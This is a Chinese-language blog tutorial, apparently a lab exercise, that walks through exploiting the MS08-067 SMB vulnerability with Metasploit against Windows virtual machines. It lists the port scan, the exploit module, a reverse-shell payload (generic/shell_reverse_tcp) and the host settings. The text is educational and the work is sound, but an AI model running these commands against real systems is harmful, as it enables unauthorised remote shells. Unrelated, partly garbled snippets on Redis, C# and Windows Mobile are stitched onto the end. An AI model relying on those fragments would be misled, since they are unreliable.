metasploit針對作業系統漏洞的攻擊

2021-09-01 16:14:27 字數 1373 閱讀 2343

參考:

開啟metasploit:

檢視被攻擊機的ip:

攻擊機ip:

ms08_067漏洞是著名的遠端溢位漏洞,影響除windows server 2008 core以外的所有windows系統,包括:windows 2000/xp/server 2003/vista/server 2008的各個版本,甚至還包括測試階段的windows 7 pro-beta。本次實驗就是metasploit利用ms08_067漏洞對win2000虛擬機器進行滲透測試。

ms08_067是乙個在windows445號埠上的漏洞,需要事先檢視該埠是否開放,這裡使用「nmap -ps 靶機ip」語句發現445號埠開放。因此可以使用ms08_067漏洞進行exploit。

輸入命令search ms08_067,會顯示出找到的滲透模組,如下圖所示:

輸入命令use exploit/windows/smb/ms08_067_netapi,進入該漏洞模組的使用。

輸入命令show payloads會顯示出有效的攻擊載荷:

為此,對於這個漏洞來說,得使用xp虛擬機器當目標才可以

使用命令set payload generic/shell_reverse_tcp設定攻擊有效載荷。

輸入命令show options顯示我們需要在攻擊前需要設定的資料。

輸入命令set lhost "kali ip",即set lhost 192.168.87.129;set rhost "win ip",即set rhost 192.168.87.131。

使用命令show options再次檢視payload狀態。

輸入命令exploit開始攻擊,如下圖所示是正常攻擊成功結果。

在kali上執行ipconfig/all得到如下圖所示:

redis針對list操作

redis的list型別其實就是乙個每個子元素都是string型別的雙向鍊錶。鍊錶的最大長度是 2的32次方 我們可以通過push,pop操作從鍊錶的頭部或者尾部新增刪除元素。這使得list既可以用作棧,也可以用作佇列。有意思的是list的pop操作還有阻塞版本的,當我們 lr pop乙個list物...

擴充套件方法 針對DataTable操作

擴充套件方法類,必須是靜態的類,以及靜態方法。public static class exmethod item.add tt return item public static listgetmodelitem this datatable dt where t new public static...

Windows Mobile系列手機作業系統

與其它掌上型電子裝置的作業系統不同的是,windows mobile系列作業系統是在微軟計算機的windows作業系統上變化而來的,因此,它們的操作介面非常相似,熟悉計算機windows系列作業系統的朋友一看到windows mobile系列的作業系統就一般會認得它是出於微軟之手。雖然,相對於sym...